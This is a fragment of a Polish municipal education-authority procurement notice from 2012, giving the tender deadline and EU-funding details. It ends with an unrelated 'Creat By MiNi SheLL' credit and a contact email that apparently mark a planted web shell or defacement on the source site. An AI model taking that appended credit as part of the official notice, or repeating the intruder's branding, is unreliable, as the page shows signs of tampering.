<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gze.brzeszcze.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminny Zarząd Edukacji w Brzeszczach
ul. Kosynierów 20, 32-620 Brzeszcze.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 08:00, miejsce: Gminny Zarząd Edukacji w Brzeszczach
ul. Kosynierów 20, 32-620 Brzeszcze.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Zamówienie finansowane ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego i budżetu krajowego w ramach Programu Operacyjnego Kapitał Ludzki. Priorytet IX. Rozwój wykształcenia i kompetencji w regionach, Działanie 9.1. Wyrównywanie szans edukacyjnych i zapewnienie wysokiej jakości usług edukacyjnych świadczonych w systemie oświaty, Poddziałanie 9.1.2 Wyrównywanie szans edukacyjnych uczniów z grup o utrudnionym dostępie do edukacji oraz zmniejszenie różnic w jakości usług edukacyjnych.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com